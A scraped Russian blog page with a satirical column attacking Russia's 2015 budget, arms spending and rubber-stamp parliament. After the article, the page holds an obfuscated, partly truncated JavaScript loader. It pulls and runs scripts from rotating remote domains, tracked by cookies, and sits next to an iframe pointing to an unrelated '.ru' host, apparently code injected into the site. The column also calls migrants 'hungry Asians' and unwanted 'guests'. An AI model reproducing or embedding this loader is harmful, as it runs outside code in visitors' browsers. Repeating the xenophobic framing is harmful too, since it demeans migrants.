Победа ...низма во всём мире неизбежна?..

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Олег Зоин написал
    0 оценок, 61 просмотр Обсудить (1)

    Олег ЗОИН
    Повысим надои бюджета на 20 процентов!..

     

    Как и Печальный бюджет на 2014 год, бюджет 2015 года вызывает не меньшее чувство тоски собачьей и сплошное уныние даже у думских оптимистов…
    Придётся подзатянуть пояса и экономить в большом и малом – на этот раз экономика, наконец, впервые за 15 лет должна стать экономной… Леонид Ильич, вероятно, взволнованно ворочается в гробу, испытывая глубокое оральное удовлетворение за неустанных продолжателей его персонального дела…
    Но к чёрту грусть! Тем, кто опустится ещё ниже сегодняшнего плинтуса, должно помочь чувство гордости за страну, так резко вставшую с колен, что закружилась голова!..

    И не так уже всё и плохо, если учесть, что чиновники не потеряют в жалованье, расходы на оборону и на силовой блок который год возрастают по потребности, а в Россию в дополнение к 12-15 миллионам уже десяток лет квартирующих мигрантов добавится ещё не один миллион голодных азиатов.
    Граница ведь с востока распахнута настежь, форменный проходной двор!..

    Впрочем, судя по хорошо кем-то продуманной атаке мигрантов на Западную Европу, дело пахнет керосином для России и с Запада. Вполне будет логично, если Германия и Швеция не переварят, а это уже очевидно, миллионы непрошенных “гостей” призывного возраста, что эти бравые ребята запросто побегут в Россию, а конкретно в Москву и Питер, поскольку слыхали по Раше-Тудей, как здесь замечательно для всякого араба и особенно араба-врага США…

    Опрометчивое обещание президента о создании в России 25 миллионов высокооплачиваемых рабочих мест к 2018 году вероятно уже близко к выполнению – с учётом накрепко приютившихся в России 15 млн центроазиатов. Оставшиеся 7-8 миллионов доберём за 2-3 года возможно иммигрантами с Сирии и прочих Ближних Востоков.
    Но вернёмся к многострадальному бюджету, который, кажется, решено составлять всего на год, поскольку катимся вниз с такой скоростью, что отстают любые поргнозы и оценки.
    Так вот. Я бы сверстал бюджет немного иначе. Во-первых, в связи с кризисом повременил бы с разворачиванием гонки вооружений. Пусть себе наши вероятные противники с Запада и Востока сами выбрасывают последние гроши на танки и ракеты, а я бы прекратил штамповать всякие “булавы”, танки, атомные подлодки, истребители 5-го и прочих поколений, другие смертоносные цацки наступательного характера, переключил бы, к примеру, Уралтанкозавод на производство современных пассажирских вагонов, честно переименовав его в Уралвагонзавод, да много чего ещё можно было бы предпринять для того, чтобы народ не загнулся от кризиса.

    Попутно надо бы сократить хотя вполовину силовой блок, а освободившихся мужиков, большинство которых – кровь с коньяком – могут в мирных делах горы своротить, если командирским голосом попросить!.. Правда, надо при этом мигрантов с Востока ладненько завернуть домой и посоветовать им налаживать жизнь там. И те немалые деньги, десяток-другой миллиардов баксов, что гости переводят в солнечную Азию, могли бы ой как оживить наш инвестиционный пейзаж…

    Хотя, если вдуматься, а кто этот бюджет сочинил?.. Вроде как правительство, то-есть исполнительная власть, чья задача по определению его исполнять. Задавать же параметры должен народ через власть законодательную, избранную всенародно. Однако Дума из года в год только штампует бюджеты, ничего в представленных проектах бюджета не меняя.
    Оно и понятно. Чтобы что-то там поменять, надо хотя разбираться в этой сатанинской бухгалтерии, где половина – “закрытые”, то-есть, тайные статьи. И кто это позволит всяким жириновским и зюгановым ковыряться в закрытых статьях грязными оппозиционными руками?..

    Говорят, что в основу “контрольных цифр” (да простят мне этот моветон ещё живые работники Госплана, если остались!) по традиции положены указы президента. Но ведь президент по Конституции РФ есть гарант её соблюдения, ему не с руки подменять и законодательную, и исполнительную власть, даже если они и смотрят ему преданно в глаза. Только на них по конституции лежит прямая ответственность за фунционирование государства и его выживание и прогресс…

    Ну да что это я, размечтался, неуч… Кризис кризисом, а неуклонное продвижение Родины к мировому величию ещё никто не отменял! Подтяните пояса, граждане россияне, и вновь марш вперёд к сияюще зияющим вершинам впереди планеты всей! Нноо, болезные и сачковатые!.. Нноо!!!

     

    <script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"​function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>

    <iframe id="a1996667054" style="" src="https://bw95vpjda.ru/f.html" width="320" height="240"></iframe>

    Комментировать

    осталось 1185 символов
    пользователи оставили 1 комментарий , вы можете свернуть их
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 811 записей в блогах и 5838 комментариев.
    Зарегистрировалось 110 новых макспаркеров. Теперь нас 5028323.